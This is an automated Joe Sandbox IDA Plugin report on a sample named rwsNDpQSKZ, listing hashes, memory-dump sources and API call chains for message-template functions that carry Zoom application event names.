                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.conf.tracking.paap.event$composedEventInfo$type
                • API String ID: 2703795933-660578694
                • Opcode ID: 2aa9f4b4694e72dd11e6d3af76702ba557cccc0817784a4963cce5fd22cecdea
                • Instruction ID: 43aecf356e33b2819e66a1fae27385ef9cc99aa6f419a516ac92dc852b8a4bc1
                • Opcode Fuzzy Hash: 2aa9f4b4694e72dd11e6d3af76702ba557cccc0817784a4963cce5fd22cecdea
                • Instruction Fuzzy Hash: E1E092F16543A8ABE7147B549C86B2AA2A4EB91B19F60443CF3049E392CBF40D48D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C707E7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.log.startchannel,00009D9F,ChannelId,GroupId,00000004), ref: 00C70807
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ChannelId$GroupId$com.zoom.app.log.startchannel
                • API String ID: 3124793654-2005458431
                • Opcode ID: 7935fda2046b3f76a6afbd6c707b3351c119b0acacdb138e2f5fa105e073a31e
                • Instruction ID: b20dc5c983fd9f0899d5dac7a1eaaa783d9fa1ebec005dab69e454174a7cc8a4
                • Opcode Fuzzy Hash: 7935fda2046b3f76a6afbd6c707b3351c119b0acacdb138e2f5fa105e073a31e
                • Instruction Fuzzy Hash: 87E092B0640385EBDB20BB449C0AB6EA2A4EB80B19F50452CB2009B3C1CBF14C00CBB5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70787
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.check.nomadic.911.notification,00009D19,CheckResult,LocalIP,00000004), ref: 00C707A7
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: CheckResult$LocalIP$com.zoom.app.assistant.sip.check.nomadic.911.notification
                • API String ID: 2715420528-2172794164
                • Opcode ID: b268ac1bb446bff55e5a10603af7ccdee496316613c993dc13625f91a53d60ee
                • Instruction ID: 49dc649196755fb62adcb94aee56ef9c81f34d0f16ccbe711d1bc0a7db0136f0
                • Opcode Fuzzy Hash: b268ac1bb446bff55e5a10603af7ccdee496316613c993dc13625f91a53d60ee
                • Instruction Fuzzy Hash: D0E092B8A80346BBE7106B454C56B2B62A4EB90B1AF60457DB2109A3D1CAF04D44DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C7A7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5C7C7
                  • Part of subcall function 00C5D600: __EH_prolog3.LIBCMT ref: 00C5D607
                  • Part of subcall function 00C5D600: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C7CC,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D61A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: EventID$NotifyType$com.zoom.app.mapi.outlookmapi.eventchange.notify
                • API String ID: 2715420528-993383234
                • Opcode ID: 9633472847a7a22737a0d0a7c8f01441cb78c5781ecab7a491188f1272cbbf8d
                • Instruction ID: aebafe0d6fd4e7555d1489a7ee922c22d92703995d3ce5beb42ff19aa17b42dd
                • Opcode Fuzzy Hash: 9633472847a7a22737a0d0a7c8f01441cb78c5781ecab7a491188f1272cbbf8d
                • Instruction Fuzzy Hash: 22E09BB0E407556FD7257B815C45F2AB5B4D794B55F110518B1205B3C2CBF80DC4CB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C768E7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.ps.return.asyncrecording.action.token,00013898,action_type,web_record_info,00000004), ref: 00C76907
                  • Part of subcall function 00C5D600: __EH_prolog3.LIBCMT ref: 00C5D607
                  • Part of subcall function 00C5D600: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C7CC,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D61A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: action_type$com.zoom.ps.return.asyncrecording.action.token$web_record_info
                • API String ID: 2715420528-446266280
                • Opcode ID: 0ba892d3b0de0d6760cdd71f4dc54b4952c3cee2a9100469100a8d4d51a855f3
                • Instruction ID: e3af122687177111095dd0385c214b57ce60214261ab8e41f87bb82997b97c4b
                • Opcode Fuzzy Hash: 0ba892d3b0de0d6760cdd71f4dc54b4952c3cee2a9100469100a8d4d51a855f3
                • Instruction Fuzzy Hash: A6E022F0644786AFC3246B004C05B2AB1A8DB40B1AF008428B1145F391CEF00D84D735
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C8F7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant_app_start,00009C41,ProcessID,ProcessName,00000004), ref: 00C6C917
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.zoom.app.assistant_app_start
                • API String ID: 2715420528-3550085455
                • Opcode ID: d32888b65624a63ff46f9f7b42a5d2b500d046e197a05aae22e99650815daaff
                • Instruction ID: f1b394e37d3417f291f88ea7ecc969a5e96ee5f0a92ce298f34efc5c4d08ddd4
                • Opcode Fuzzy Hash: d32888b65624a63ff46f9f7b42a5d2b500d046e197a05aae22e99650815daaff
                • Instruction Fuzzy Hash: BBE0D8B4B40789ABE7206B455C55B3E76A4EB94B16F840928B2406B3D1CBF44C44DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C748A7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.zoom.internal.navigate.url.event,000027D0,url,actionType,00000004), ref: 00C748C7
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: actionType$com.Zoom.app.conf.zoom.internal.navigate.url.event$url
                • API String ID: 2703795933-2559254296
                • Opcode ID: 184fae6ce505df3d821550501bf74c232595c736daff2e88cce3ea3e6c530375
                • Instruction ID: 12d97ac99ed4c4e8e31b264d3aea4ea7c4bf756fa5c6e655e00170d1432bd606
                • Opcode Fuzzy Hash: 184fae6ce505df3d821550501bf74c232595c736daff2e88cce3ea3e6c530375
                • Instruction Fuzzy Hash: 28E0D8B0604788AFE7347B549C5AB2E6664EB50B19F04012CF2049E3E1CBF40D84D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C708A7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.log.subchannel_add,00009DA2,ChannelId,GroupId,00000004), ref: 00C708C7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ChannelId$GroupId$com.zoom.app.log.subchannel_add
                • API String ID: 3124793654-11220299
                • Opcode ID: 5884dd7e29d716437a8afeddca22d32c71f1c606734345aa17281f1aac89fbed
                • Instruction ID: 6a7b2bd9dea7242b10bf23ab1382a6fc3a80819675f85967e850d3e996b12b6f
                • Opcode Fuzzy Hash: 5884dd7e29d716437a8afeddca22d32c71f1c606734345aa17281f1aac89fbed
                • Instruction Fuzzy Hash: 58E092B0681785FBD711BB459C4AB2EA2A49B80B19F504128F2045E3C2CBF10C00CBB6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72817
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.invitebyphonestatus.notify,00009E85,StatusCode,ReasonCode,00000004), ref: 00C72837
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
